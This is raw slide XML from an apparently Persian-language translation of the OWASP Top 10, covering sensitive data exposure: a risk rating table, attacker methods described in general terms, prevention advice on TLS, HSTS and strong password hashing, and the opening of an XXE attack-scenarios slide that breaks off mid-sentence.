                <a:spcPts val="2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اطمینان حاصل کنید از الگوریتم های استاندارد، پروتکل ها و کلیدهای استاندارد به روز و قوی در جای خود استفاده می شود. از مدیریت کلید مناسب استفاده کنید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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رمزگذاری تمام داده ها در حال انتقال با پروتکل های امن مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>با رمزهای محرمانه بدون نقص (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>PFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اولویت بندی رمز توسط سرور و پارامترهای امن انجام گردد. اعمال رمزگذاری را با استفاده از دستورالعمل هایی مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTTP Security Transport Strict Security (HSTS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>انجام دهید.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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برای پاسخ هایی که حاوی اطلاعات حساس هستند، ذخیره سازی (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Caching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) غیرفعال شود. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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رمزهای عبور را با استفاده از توابع هش قوی منطبق و هش </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>salting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> با یک عامل کار (عامل تاخیر) مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Argon2، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>PBKDF2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ذخیره کنید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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به طور مستقل اثربخشی پیکربندی و تنظیمات را بررسی کنید.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>افشای اطلاعات حساس</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3077862577"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="23496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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۲</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۳</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۲</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۳</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just" rtl="1">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gn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مهاجم</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ها به جای حملات مخفیانه به صورت مستقیم، اقدام به سرقت کلیدها، اجرای حملات مردمیانی، یا سرقت اطلاعات رمز نشده سمت سرور یا کاربر، هنگام انتقال اطلاعات می کنند، برای مثال مروررگر. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>حمله دستی به طور کلی مورد نیاز است. قبلا بانک های داده رمز عبور بازیابی شده باید</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> توسط </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>GPU</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ها (واحدهای پردازش گرافیکی) مورد حمله جامع قرار می گرفت. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>در طول چند سال گذشته، این شایعترین حمله تاثیرگذار بوده است. شایع ترین اشتباه هم</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> رمز نکردن اطلاعات حساس است</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>. هنگامی که از رمزنگاری استفاده می شود، تولید و مدیریت کلید ضعیف، و الگوریتم ضعیف، استفاده از پروتکل و رمز</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> مشترک</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>، مخصوصا برای تکنیک های ذخیره سازی هشینگ رمزنگاری ضعیف است. برای اطلاعات</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> در حال انتقال، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ضعف های سمت سرور بهبه راحتی قابل</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> تشخیص هستند. اما تشخیص برای داده هایی که در داخل سرور ذخیره شده اند سخت است. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>یک شکست امنیتی اغلب تمام اطلاعاتی را که باید محافظت شوند</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> را </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>به خطر می اندازد. به طور معمول، این اطلاعات شامل اطلاعات شخصی حساس (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>PII</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>) مانند پرونده های بهداشتی، اعتبارنامه ها، اطلاعات شخصی و کارت های اعتباری است که اغلب نیاز به حفاظت بر</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> اساس </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>قوانین یا مقرراتی مانند </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>GDPR </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> اتحادیه اروپا یا قوانین حفظ حریم خصوصی محلی دارند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌هایی از سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>موارد متعدد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> به صورت عمومی کشف شده است، از جمله حمله به دستگاه های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Embedded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> در بسیاری از مکان های غیر منتظره، از جمله وابستگی های (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>nested dependencies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
